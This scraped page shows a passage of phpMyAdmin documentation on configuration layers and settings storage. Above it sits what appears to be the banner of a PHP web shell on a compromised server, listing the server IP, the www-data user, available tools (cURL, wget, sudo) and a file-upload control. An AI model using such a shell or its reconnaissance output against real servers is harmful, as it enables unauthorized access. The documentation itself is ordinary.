Server IP : 15.235.198.142 / Your IP : 216.73.216.14 Web Server : Apache/2.4.58 (Ubuntu) System : Linux ballsack 6.8.0-45-generic #45-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 30 12:02:04 UTC 2024 x86_64 User : www-data ( 33) PHP Version : 8.3.6 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /usr/share/doc/phpmyadmin/html/_sources/ |
Upload File : |
Configuring phpMyAdmin ---------------------- There are many configuration settings that can be used to customize the interface. Those settings are described in :ref:`config`. There are several layers of the configuration. The global settings can be configured in :file:`config.inc.php` as described in :ref:`config`. This is only way to configure connections to databases and other system wide settings. On top of this there are user settings which can be persistently stored in :ref:`linked-tables`, possibly automatically configured through :ref:`zeroconf`. If the :ref:`linked-tables` are not configured, the settings are temporarily stored in the session data; these are valid only until you logout. You can also save the user configuration for further use, either download them as a file or to the browser local storage. You can find both those options in the :guilabel:`Settings` tab. The settings stored in browser local storage will be automatically offered for loading upon your login to phpMyAdmin.